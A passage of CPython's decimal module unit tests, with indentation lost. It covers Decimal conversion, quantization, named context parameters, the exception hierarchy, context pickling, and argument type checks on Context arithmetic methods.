# bpo-46361
for x in range(-5, 257):
self.assertIs(int(Decimal(x)), x)
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
@requires_legacy_unicode_capi
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
